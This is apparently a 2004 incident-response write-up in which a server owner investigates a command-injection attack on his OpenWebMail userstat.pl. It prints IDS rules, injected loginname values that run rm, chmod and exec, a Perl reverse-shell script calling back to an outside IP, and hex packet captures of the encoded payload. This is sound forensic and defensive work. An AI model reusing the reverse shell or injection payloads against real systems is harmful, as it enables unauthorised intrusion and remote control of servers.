Gwee used to exploit userstat.pl on mnin.org webmail


Back Home

Last Updated: Tuesday August 24, 2004

Michael Ligh ([email protected])


Table of Contents

  1. The First Gwee Episode: Explanation & Documentation
  2. The Second Gwee Episode: Packet Captures
  3. References

i. The First Gwee Episode

Well here's the story from a new perspective: investigate my own hacked system. Not as funny as the others, but definitely more exciting and interesting.

Let's start from the beginning. Between midnight and 3 AM on 8/18/2004, some traffic flowing from client to server tripped 3 IDS alerts (2 unique). The rules were so:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-ATTACKS perl execution attempt"; flow:to_server,established; content:"perl%20"; nocase; classtype:web-application-attack; sid:1356; rev:5;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-ATTACKS perl execution attempt"; flow:to_server,established; content:"perl%20"; nocase; classtype:web-application-attack; sid:1356; rev:5;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-ATTACKS rm command attempt"; flow:to_server,established; content:"rm%20"; nocase; classtype:web-application-attack; sid:1365; rev:5;)

You can see an attempt was made from one address as early as midnight. The second set of alerts came from another source address almost 3 hours later.It was unfortunate, but not surprising to dig up the payload contents of the packets that set off those alerts. Here are the HTTP headers:

POST /cgi-bin/openwebmail/userstat.pl
HTTP/1.1..
User-Agent: Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1)
Host: mnin.ods.org
Pragma: no-cache
Connection: close
Content-Length: 2143
Content-Type: application/x-www-form-urlencoded

And then follows the unicode encoded parameters:

...loginname=2%3E
/dev/null%3Bperl
%20-e%20%22print
%20%5C%22%5C043%...

A bunch of junk, huh? What this first packet did was submit a perl script to an executable openwebmail component named userstat.pl, which does no bounds checking on its input data. It is a known vulnerability that has since been patched by the authors, however the version on my server was not updated.

In particular, according to SecuriTeam, [1] "the script doesn't properly filter out shell characters from the loginname parameter. The loginname parameter is used as an argument when executing openwebmail-tool.pl from the vulnerable script. By adding a ";", "|" or "( )" followed by the shell command to a http GET, HEAD or POST request an attacker can execute arbitrary system commands."

There are several other advisories online and even more example exploit scripts. In this case, it is pretty clear what was used to generate the attack (gwee), based on the payload contents of the packet that set off the 3rd IDS alert:

loginname=2%3E/d
ev/null%3Brm%20%
2Df%20/var/tmp/.
vetx.95

Or translated:

loginname=2>/dev/null; rm -f /var/tmp/vetx.95

This is the output redirector part of the command being fed to userstat.pl. Finding this packet was my clue to check if /var/tmp/vetx.95 resided on the filesystem, still uncertain if this was a false positive or not. Things unfolded when I mistyped the path and ended up printing the directory listing for /tmp instead of /var/tmp. I found an executable perl script named w00t that contained socket code to connect back to the attacker's system on ports 999 and 7700 and spawn a shell. It looked like this:

#!/usr/bin/perl
use Socket; 
use IO::Handle; 
use POSIX; 
$proto = getprotobyname('tcp'); 
socket(Socket_Handle, AF_INET, SOCK_STREAM, $proto); 
$sin = sockaddr_in(999 ,inet_aton("202.130.135.153" )); 
connect(Socket_Handle,$sin); dup2(Socket_Handle->fileno, 0); 
dup2(Socket_Handle->fileno, 1); 
dup2(Socket_Handle->fileno, 2); 
exec { "/bin/sh" } "";

It was now fact that an attacker had definitely exploited something in order to write a file to the /tmp directory of the disk. At this point it was still an uncertainty exactly what was exploited and if the file was executed or not. That changed fast as soon as I viewed the egress filtering logs. The script was indeed executed as evidenced by the following dropped traffic:

Aug 18 00:00:36 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=202.130.135.153 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=60196 DF PROTO=TCP SPT=43102 DPT=999 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 00:00:39 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=202.130.135.153 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=60198 DF PROTO=TCP SPT=43102 DPT=999 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 00:00:45 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=202.130.135.153 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=60241 DF PROTO=TCP SPT=43102 DPT=999 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 00:00:57 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=202.130.135.153 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=60243 DF PROTO=TCP SPT=43102 DPT=999 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 00:01:21 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=202.130.135.153 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=60307 DF PROTO=TCP SPT=43102 DPT=999 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 00:02:09 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=202.130.135.153 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=61281 DF PROTO=TCP SPT=43102 DPT=999 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 02:46:04 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=130.233.30.237 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=64581 DF PROTO=TCP SPT=43153 DPT=7700 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 02:46:07 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=130.233.30.237 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=64582 DF PROTO=TCP SPT=43153 DPT=7700 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 02:46:13 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=130.233.30.237 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=64591 DF PROTO=TCP SPT=43153 DPT=7700 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 02:46:25 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=130.233.30.237 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=64592 DF PROTO=TCP SPT=43153 DPT=7700 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 02:46:49 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=130.233.30.237 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=64593 DF PROTO=TCP SPT=43153 DPT=7700 WINDOW=5840 RES=0x00 SYN URGP=0
Aug 18 02:47:37 fire kernel: IPTABLES DROP (FWD): IN=eth2 OUT=eth1 SRC=web.internal.ip DST=130.233.30.237 LEN=60 TOS=0x00 PREC=0x00 TTL=63 ID=64629 DF PROTO=TCP SPT=43153 DPT=7700 WINDOW=5840 RES=0x00 SYN URGP=0

Fortunately the attacker was never allowed to get the backdoor up and running due to the outbound filtering in place. If that ever changes, you might see 'investigating my own hacked system part II'. Anyway, I mentioned earlier that a program named Gwee, [2] was probably responsible ffor the attack, based on a keyword found in the second packet. The file named vetx.95 is associated with gwee, as found in its man page:

-T /var/tmp/.vetx.95 Choose a different temporary filename for the shellcode/backdoor on the target than the default.

It would make even more sense that gwee stands for General Web Exploitation Engine, described by its authors as "a small program written in C designed to exploit input validation vulnerabilities in web scripts, such as Perl CGIs, PHP, etc".

Conveniently, there is a pre-written script especially for OpenWebMail's vulnerable userstat.pl, [3]. That is pretty much a wrap on this incident. Hopefully it won't happen again, but if it does, I'll have fun writing about it.

ii. The Second Gwee Episode: Packet Captures

Just for verification and log correlation, here is the whole attempt over again. Why, all the sudden, would this attack which has existed for over a year, become so common? Thanks to Matt, there is at least one rational explanation. Search engines indexing a web site have records of pages and content. When people want to try an exploit, they no longer have to guess what domains host particular files - they can just Google them!

Here are the Apache (cough, cough, I mean the web server thats not Apache's) access logs:

62.111.240.132 - - [13/Sep/2004:15:05:30 -0400] "POST /cgi-bin/openwebmail/userstat.pl HTTP/1.1" 200 3 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
62.111.240.132 - - [13/Sep/2004:15:05:39 -0400] "GET /cgi-bin/openwebmail/userstat.pl?loginname=|chmod%20755%20/tmp/w00t HTTP/1.0" 200 3 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
62.111.240.132 - - [13/Sep/2004:15:05:47 -0400] "GET /cgi-bin/openwebmail/userstat.pl?loginname=|exec%20/tmp/w00t HTTP/1.0" 200 3 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Here we go, all the way until the end:

09/13-15:05:30.458245 62.111.240.132:36368 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:1298 IpLen:20 DgmLen:60 DF
******S* Seq: 0x899ACEB2  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 763022240 0 NOP WS: 0

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:30.458367 10.1.1.100:80 -> 62.111.240.132:36368
TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0x24126FEB  Ack: 0x899ACEB3  Win: 0x16A0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 1991961816 763022240
TCP Options => NOP WS: 0

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:30.619452 62.111.240.132:36368 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:1299 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x899ACEB3  Ack: 0x24126FEC  Win: 0x16D0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763022259 1991961816

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:30.645368 62.111.240.132:36368 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:1300 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x899ACEB3  Ack: 0x24126FEC  Win: 0x16D0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763022259 1991961816
50 4F 53 54 20 2F 63 67 69 2D 62 69 6E 2F 6F 70  POST /cgi-bin/op
65 6E 77 65 62 6D 61 69 6C 2F 75 73 65 72 73 74  enwebmail/userst
61 74 2E 70 6C 20 48 54 54 50 2F 31 2E 31 0D 0A  at.pl HTTP/1.1..
55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69  User-Agent: Mozi
6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69  lla/4.0 (compati
62 6C 65 3B 20 4D 53 49 45 20 36 2E 30 3B 20 57  ble; MSIE 6.0; W
69 6E 64 6F 77 73 20 4E 54 20 35 2E 31 29 0D 0A  indows NT 5.1)..
48 6F 73 74 3A 20 32 34 2E 32 2E 31 35 33 2E 31  Host: 24.2.153.1
36 38 0D 0A 50 72 61 67 6D 61 3A 20 6E 6F 2D 63  68..Pragma: no-c
61 63 68 65 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E  ache..Connection
3A 20 63 6C 6F 73 65 0D 0A 43 6F 6E 74 65 6E 74  : close..Content
2D 4C 65 6E 67 74 68 3A 20 32 31 34 33 0D 0A 43  -Length: 2143..C
6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70  ontent-Type: app
6C 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66  lication/x-www-f
6F 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D 0A  orm-urlencoded..
0D 0A 6C 6F 67 69 6E 6E 61 6D 65 3D 32 25 33 45  ..loginname=2%3E
2F 64 65 76 2F 6E 75 6C 6C 25 33 42 70 65 72 6C  /dev/null%3Bperl
25 32 30 2D 65 25 32 30 25 32 32 70 72 69 6E 74  %20-e%20%22print
25 32 30 25 35 43 25 32 32 25 35 43 30 34 33 25  %20%5C%22%5C043%
35 43 30 34 31 25 35 43 30 35 37 25 35 43 31 36  5C041%5C057%5C16
35 25 35 43 31 36 33 25 35 43 31 36 32 25 35 43  5%5C163%5C162%5C
30 35 37 25 35 43 31 34 32 25 35 43 31 35 31 25  057%5C142%5C151%
35 43 31 35 36 25 35 43 30 35 37 25 35 43 31 36  5C156%5C057%5C16
30 25 35 43 31 34 35 25 35 43 31 36 32 25 35 43  0%5C145%5C162%5C
31 35 34 25 35 43 30 31 32 25 35 43 31 36 35 25  154%5C012%5C165%
35 43 31 36 33 25 35 43 31 34 35 25 35 43 30 34  5C163%5C145%5C04
30 25 35 43 31 32 33 25 35 43 31 35 37 25 35 43  0%5C123%5C157%5C
31 34 33 25 35 43 31 35 33 25 35 43 31 34 35 25  143%5C153%5C145%
35 43 31 36 34 25 35 43 30 37 33 25 35 43 30 34  5C164%5C073%5C04
30 25 35 43 31 36 35 25 35 43 31 36 33 25 35 43  0%5C165%5C163%5C
31 34 35 25 35 43 30 34 30 25 35 43 31 31 31 25  145%5C040%5C111%
35 43 31 31 37 25 35 43 30 37 32 25 35 43 30 37  5C117%5C072%5C07
32 25 35 43 31 31 30 25 35 43 31 34 31 25 35 43  2%5C110%5C141%5C
31 35 36 25 35 43 31 34 34 25 35 43 31 35 34 25  156%5C144%5C154%
35 43 31 34 35 25 35 43 30 37 33 25 35 43 30 34  5C145%5C073%5C04
30 25 35 43 31 36 35 25 35 43 31 36 33 25 35 43  0%5C165%5C163%5C
31 34 35 25 35 43 30 34 30 25 35 43 31 32 30 25  145%5C040%5C120%
35 43 31 31 37 25 35 43 31 32 33 25 35 43 31 31  5C117%5C123%5C11
31 25 35 43 31 33 30 25 35 43 30 37 33 25 35 43  1%5C130%5C073%5C
30 34 30 25 35 43 30 34 34 25 35 43 31 36 30 25  040%5C044%5C160%
35 43 31 36 32 25 35 43 31 35 37 25 35 43 31 36  5C162%5C157%5C16
34 25 35 43 31 35 37 25 35 43 30 34 30 25 35 43  4%5C157%5C040%5C
30 37 35 25 35 43 30 34 30 25 35 43 31 34 37 25  075%5C040%5C147%
35 43 31 34 35 25 35 43 31 36 34 25 35 43 31 36  5C145%5C164%5C16
30 25 35 43 31 36 32 25 35 43 31 35 37 25 35 43  0%5C162%5C157%5C
31 36 34 25 35 43 31 35 37 25 35 43 31 34 32 25  164%5C157%5C142%
35 43 31 37 31 25 35 43 31 35 36 25 35 43 31 34  5C171%5C156%5C14
31 25 35 43 31 35 35 25 35 43 31 34 35 25 35 43  1%5C155%5C145%5C
30 35 30 25 35 43 30 34 37 25 35 43 31 36 34 25  050%5C047%5C164%
35 43 31 34 33 25 35 43 31 36 30 25 35 43 30 34  5C143%5C160%5C04
37 25 35 43 30 35 31 25 35 43 30 37 33 25 35 43  7%5C051%5C073%5C
30 34 30 25 35 43 31 36 33 25 35 43 31 35 37 25  040%5C163%5C157%
35 43 31 34 33 25 35 43 31 35 33 25 35 43 31 34  5C143%5C153%5C14
35 25 35 43 31 36 34 25 35 43 30 35 30 25 35 43  5%5C164%5C050%5C
31 32 33 25 35 43 31 35 37 25 35 43 31 34 33 25  123%5C157%5C143%
35 43 31 35 33 25 35 43 31 34 35 25 35 43 31 36  5C153%5C145%5C16
34 25 35 43 31 33 37 25 35 43 31 31 30 25 35 43  4%5C137%5C110%5C
31 34 31 25 35 43 31 35 36 25 35 43 31 34 34 25  141%5C156%5C144%
35 43 31 35 34 25 35 43 31 34 35 25 35 43 30 35  5C154%5C145%5C05
34 25 35 43 30 34 30 25 35 43 31 30 31 25 35 43  4%5C040%5C101%5C
31 30 36 25 35 43 31 33 37 25 35 43 31 31 31 25  106%5C137%5C111%
35 43 31 31 36 25 35 43 31 30 35 25 35 43 31 32  5C116%5C105%5C12
34 25 35 43 30 35 34 25 35 43 30 34 30 25 35 43  4%5C054%5C040%5C
31 32 33 25 35 43 31 31 37 25 35 43 31 30 33 25  123%5C117%5C103%
35 43 31 31 33 25 35 43 31 33 37 25 35 43 31 32  5C113%5C137%5C12
33 25 35 43 31 32 34 25 35 43 31 32 32 25 35 43  3%5C124%5C122%5C
31 30 35 25 35 43 31 30 31 25 35 43 31 31 35 25  105%5C101%5C115%
35 43 30 35 34 25 35 43 30 34 30 25 35 43 30 34  5C054%5C040%5C04
34 25 35 43 31 36 30 25 35 43 31 36 32 25 35 43  4%5C160%5C162%5C
31 35 37 25 35 43 31 36 34 25 35 43 31 35 37 25  157%5C164%5C157%
35 43 30 35 31 25 35 43 30 37 33 25 35 43 30 34  5C051%5C073%5C04
30 25 35 43 30 34 34 25 35 43 31 36 33 25 35 43  0%5C044%5C163%5C
31 35 31 25 35 43 31 35 36 25 35 43 30 34 30 25  151%5C156%5C040%
35 43 30 37 35 25 35 43 30 34 30 25 35 43 31 36  5C075%5C040%5C16
33 25 35 43 31 35 37 25 35 43 31 34 33 25 35 43  3%5C157%5C143%5C
31 35 33 25 35 43 31 34 31 25 35 43 31 34 34 25  153%5C141%5C144%
35 43 31 34 34 25 35 43 31 36 32 25 35 43 31 33  5C144%5C162%5C13
37 25 35 43 31 35 31 25 35 43 31 35 36 25 35 43  7%5C151%5C156%5C
30 35 30 25 35 43 30 37 30 25 35 43 30 36 30 25  050%5C070%5C060%
35 43 30 37 30 25 35 43 30 36 30 25 35 43 30 34  5C070%5C060%5C04
30 25 35 43 30 35 34 25 35 43 31 35 31 25 35 43  0%5C054%5C151%5C
31 35 36 25 35 43 31 34 35 25 35 43 31 36 34 25  156%5C145%5C164%
35 43 31 33 37 25 35 43 31 34 31 25 35 43 31 36  5C137%5C141%5C16
34 25 35 43 31 35 37 25 35 43 31 35 36 25 35 43  4%5C157%5C156%5C
30 35 30 25 35 43 30 34 32 25 35 43 30 36 36 25  050%5C042%5C066%
35 43 30 36 32 25 35 43 30 35 36 25 35 43 30 36  5C062%5C056%5C06
31 25 35 43 30 36 31 25 35 43 30 36 31 25 35 43  1%5C061%5C061%5C
30 35 36 25 35 43 30 36 32 25 35 43 30 36 34 25  056%5C062%5C064%
35 43 30 36 30 25 35 43 30 35 36 25 35 43 30 36  5C060%5C056%5C06
31 25 35 43 30 36 33 25 35 43 30 36 30 25 35 43  1%5C063%5C060%5C
30 34 32 25 35 43 30 34                          042%5C04

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:30.645406 10.1.1.100:80 -> 62.111.240.132:36368
TCP TTL:64 TOS:0x0 ID:33429 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x24126FEC  Ack: 0x899AD45B  Win: 0x21F0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991962003 763022259

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:30.660420 62.111.240.132:36368 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:1301 IpLen:20 DgmLen:993 DF
***AP*** Seq: 0x899AD45B  Ack: 0x24126FEC  Win: 0x16D0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763022259 1991961816
30 25 35 43 30 35 31 25 35 43 30 35 31 25 35 43  0%5C051%5C051%5C
30 37 33 25 35 43 30 34 30 25 35 43 31 34 33 25  073%5C040%5C143%
35 43 31 35 37 25 35 43 31 35 36 25 35 43 31 35  5C157%5C156%5C15
36 25 35 43 31 34 35 25 35 43 31 34 33 25 35 43  6%5C145%5C143%5C
31 36 34 25 35 43 30 35 30 25 35 43 31 32 33 25  164%5C050%5C123%
35 43 31 35 37 25 35 43 31 34 33 25 35 43 31 35  5C157%5C143%5C15
33 25 35 43 31 34 35 25 35 43 31 36 34 25 35 43  3%5C145%5C164%5C
31 33 37 25 35 43 31 31 30 25 35 43 31 34 31 25  137%5C110%5C141%
35 43 31 35 36 25 35 43 31 34 34 25 35 43 31 35  5C156%5C144%5C15
34 25 35 43 31 34 35 25 35 43 30 35 34 25 35 43  4%5C145%5C054%5C
30 34 34 25 35 43 31 36 33 25 35 43 31 35 31 25  044%5C163%5C151%
35 43 31 35 36 25 35 43 30 35 31 25 35 43 30 37  5C156%5C051%5C07
33 25 35 43 30 34 30 25 35 43 31 34 34 25 35 43  3%5C040%5C144%5C
31 36 35 25 35 43 31 36 30 25 35 43 30 36 32 25  165%5C160%5C062%
35 43 30 35 30 25 35 43 31 32 33 25 35 43 31 35  5C050%5C123%5C15
37 25 35 43 31 34 33 25 35 43 31 35 33 25 35 43  7%5C143%5C153%5C
31 34 35 25 35 43 31 36 34 25 35 43 31 33 37 25  145%5C164%5C137%
35 43 31 31 30 25 35 43 31 34 31 25 35 43 31 35  5C110%5C141%5C15
36 25 35 43 31 34 34 25 35 43 31 35 34 25 35 43  6%5C144%5C154%5C
31 34 35 25 35 43 30 35 35 25 35 43 30 37 36 25  145%5C055%5C076%
35 43 31 34 36 25 35 43 31 35 31 25 35 43 31 35  5C146%5C151%5C15
34 25 35 43 31 34 35 25 35 43 31 35 36 25 35 43  4%5C145%5C156%5C
31 35 37 25 35 43 30 35 34 25 35 43 30 34 30 25  157%5C054%5C040%
35 43 30 36 30 25 35 43 30 35 31 25 35 43 30 37  5C060%5C051%5C07
33 25 35 43 30 34 30 25 35 43 31 34 34 25 35 43  3%5C040%5C144%5C
31 36 35 25 35 43 31 36 30 25 35 43 30 36 32 25  165%5C160%5C062%
35 43 30 35 30 25 35 43 31 32 33 25 35 43 31 35  5C050%5C123%5C15
37 25 35 43 31 34 33 25 35 43 31 35 33 25 35 43  7%5C143%5C153%5C
31 34 35 25 35 43 31 36 34 25 35 43 31 33 37 25  145%5C164%5C137%
35 43 31 31 30 25 35 43 31 34 31 25 35 43 31 35  5C110%5C141%5C15
36 25 35 43 31 34 34 25 35 43 31 35 34 25 35 43  6%5C144%5C154%5C
31 34 35 25 35 43 30 35 35 25 35 43 30 37 36 25  145%5C055%5C076%
35 43 31 34 36 25 35 43 31 35 31 25 35 43 31 35  5C146%5C151%5C15
34 25 35 43 31 34 35 25 35 43 31 35 36 25 35 43  4%5C145%5C156%5C
31 35 37 25 35 43 30 35 34 25 35 43 30 34 30 25  157%5C054%5C040%
35 43 30 36 31 25 35 43 30 35 31 25 35 43 30 37  5C061%5C051%5C07
33 25 35 43 30 34 30 25 35 43 31 34 34 25 35 43  3%5C040%5C144%5C
31 36 35 25 35 43 31 36 30 25 35 43 30 36 32 25  165%5C160%5C062%
35 43 30 35 30 25 35 43 31 32 33 25 35 43 31 35  5C050%5C123%5C15
37 25 35 43 31 34 33 25 35 43 31 35 33 25 35 43  7%5C143%5C153%5C
31 34 35 25 35 43 31 36 34 25 35 43 31 33 37 25  145%5C164%5C137%
35 43 31 31 30 25 35 43 31 34 31 25 35 43 31 35  5C110%5C141%5C15
36 25 35 43 31 34 34 25 35 43 31 35 34 25 35 43  6%5C144%5C154%5C
31 34 35 25 35 43 30 35 35 25 35 43 30 37 36 25  145%5C055%5C076%
35 43 31 34 36 25 35 43 31 35 31 25 35 43 31 35  5C146%5C151%5C15
34 25 35 43 31 34 35 25 35 43 31 35 36 25 35 43  4%5C145%5C156%5C
31 35 37 25 35 43 30 35 34 25 35 43 30 34 30 25  157%5C054%5C040%
35 43 30 36 32 25 35 43 30 35 31 25 35 43 30 37  5C062%5C051%5C07
33 25 35 43 30 34 30 25 35 43 31 34 35 25 35 43  3%5C040%5C145%5C
31 37 30 25 35 43 31 34 35 25 35 43 31 34 33 25  170%5C145%5C143%
35 43 30 34 30 25 35 43 31 37 33 25 35 43 30 34  5C040%5C173%5C04
30 25 35 43 30 34 32 25 35 43 30 35 37 25 35 43  0%5C042%5C057%5C
31 34 32 25 35 43 31 35 31 25 35 43 31 35 36 25  142%5C151%5C156%
35 43 30 35 37 25 35 43 31 36 33 25 35 43 31 35  5C057%5C163%5C15
30 25 35 43 30 34 32 25 35 43 30 34 30 25 35 43  0%5C042%5C040%5C
31 37 35 25 35 43 30 34 30 25 35 43 30 34 32 25  175%5C040%5C042%
35 43 30 34 32 25 35 43 30 37 33 25 35 43 30 31  5C042%5C073%5C01
32 25 35 43 25 32 32 25 32 32 25 32 30 25 33 45  2%5C%22%22%20%3E
2F 74 6D 70 2F 77 30 30 74 0D 0A 0D 0A           /tmp/w00t....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:30.660441 10.1.1.100:80 -> 62.111.240.132:36368
TCP TTL:64 TOS:0x0 ID:33430 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x24126FEC  Ack: 0x899AD808  Win: 0x2D40  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991962018 763022259

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:38.740509 10.1.1.100:80 -> 62.111.240.132:36368
TCP TTL:64 TOS:0x0 ID:33431 IpLen:20 DgmLen:271 DF
***AP*** Seq: 0x24126FEC  Ack: 0x899AD808  Win: 0x2D40  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991970099 763022259
48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D  HTTP/1.1 200 OK.
0A 44 61 74 65 3A 20 4D 6F 6E 2C 20 31 33 20 53  .Date: Mon, 13 S
65 70 20 32 30 30 34 20 31 39 3A 30 35 3A 33 30  ep 2004 19:05:30
20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70   GMT..Server: Ap
61 63 68 65 0D 0A 50 72 61 67 6D 61 3A 20 6E 6F  ache..Pragma: no
2D 63 61 63 68 65 0D 0A 43 61 63 68 65 2D 63 6F  -cache..Cache-co
6E 74 72 6F 6C 3A 20 6E 6F 2D 63 61 63 68 65 2C  ntrol: no-cache,
6E 6F 2D 73 74 6F 72 65 0D 0A 43 6F 6E 6E 65 63  no-store..Connec
74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 54 72 61  tion: close..Tra
6E 73 66 65 72 2D 45 6E 63 6F 64 69 6E 67 3A 20  nsfer-Encoding:
63 68 75 6E 6B 65 64 0D 0A 43 6F 6E 74 65 6E 74  chunked..Content
2D 54 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69  -Type: applicati
6F 6E 2F 78 2D 6A 61 76 61 73 63 72 69 70 74 0D  on/x-javascript.
0A 0D 0A 33 0D 0A 2F 2F 0A 0D 0A                 ...3..//...

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:38.741406 10.1.1.100:80 -> 62.111.240.132:36368
TCP TTL:64 TOS:0x0 ID:33432 IpLen:20 DgmLen:57 DF
***AP*** Seq: 0x241270C7  Ack: 0x899AD808  Win: 0x2D40  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991970100 763022259
30 0D 0A 0D 0A                                   0....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:38.741557 10.1.1.100:80 -> 62.111.240.132:36368
TCP TTL:64 TOS:0x0 ID:33433 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x241270CC  Ack: 0x899AD808  Win: 0x2D40  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991970100 763022259

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:38.900218 62.111.240.132:36368 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:1302 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x899AD808  Ack: 0x241270C7  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763023086 1991970099

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:38.901170 62.111.240.132:36368 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:1303 IpLen:20 DgmLen:52 DF
***A*R** Seq: 0x899AD808  Ack: 0x241270C7  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763023086 1991970099

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:38.903687 62.111.240.132:36369 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:3243 IpLen:20 DgmLen:60 DF
******S* Seq: 0x8A5FC245  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 763023086 0 NOP WS: 0

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:38.903727 10.1.1.100:80 -> 62.111.240.132:36369
TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0x24D38330  Ack: 0x8A5FC246  Win: 0x16A0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 1991970262 763023086
TCP Options => NOP WS: 0

